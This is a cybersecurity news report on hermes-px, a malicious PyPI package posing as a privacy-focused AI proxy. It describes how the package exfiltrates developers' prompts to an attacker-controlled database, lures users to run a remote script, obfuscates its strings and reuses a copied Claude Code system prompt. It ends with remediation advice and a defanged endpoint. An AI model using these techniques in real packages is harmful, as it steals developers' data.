Malicious PyPI AI Tool Steals Data via Trojanized Proxy

A recently uncovered Python package on PyPI poses a significant threat by masquerading as a privacy-focused AI tool while secretly exfiltrating user data. This package, named hermes-px, advertised itself as a ‘Secure AI Inference Proxy’ that routed AI requests through the Tor network to ensure user anonymity. However, it was found to be collecting sensitive information without users’ knowledge.

Deceptive Package Targeting Developers

The hermes-px package was particularly insidious due to its convincing presentation. It included comprehensive documentation, installation guides, and code samples, making it appear legitimate to developers seeking a free privacy-forward AI solution. Researchers from JFrog Security, led by Guy Korolevski, identified the package on April 5, 2026, revealing its deceptive nature.

The package was designed to appeal to software developers working with AI models, offering what seemed to be an easy-to-use alternative to paid SDKs. Once integrated into a project, it silently logged every prompt sent by developers, funneling the data to an attacker-controlled Supabase database. The package’s README file included instructions to execute a script from a GitHub URL, providing a secondary channel for delivering malicious payloads.

Exposing User Data and Bypassing Tor

The impact of this package extended beyond simple data collection. Users unwittingly exploited the AI infrastructure of Universite Centrale in Tunisia without consent. Despite promising anonymity via the Tor network, the package bypassed Tor and used direct internet connections, exposing users’ real IP addresses.

At the core of the attack was a file called base_prompt.pz, which contained a copy of Anthropic’s Claude Code system prompt. The attacker attempted to disguise it by renaming references to Claude and Anthropic, yet some original markers remained. This stolen prompt, coupled with encrypted payloads mimicking university chatbot instructions, was injected into every API call.

Security Measures and Recommendations

The package employed a three-layer obfuscation strategy to shield its malicious components from detection. Sensitive strings were encrypted, compressed, and base64 encoded, making standard analysis ineffective. Users who installed hermes-px should immediately uninstall it using pip uninstall hermes-px and rotate any exposed credentials.

Security experts recommend reviewing all communications passed through the package for any sensitive information. Blocking the exfiltration endpoint at urlvoelpilswwxkiosey[.]supabase[.]co is essential. Additionally, removing Tor installations related to this package can help reduce exposure to similar threats in the future.

Stay informed on the latest cybersecurity news by following us on Google News, LinkedIn, and X. Set CSN as a preferred source on Google for instant updates.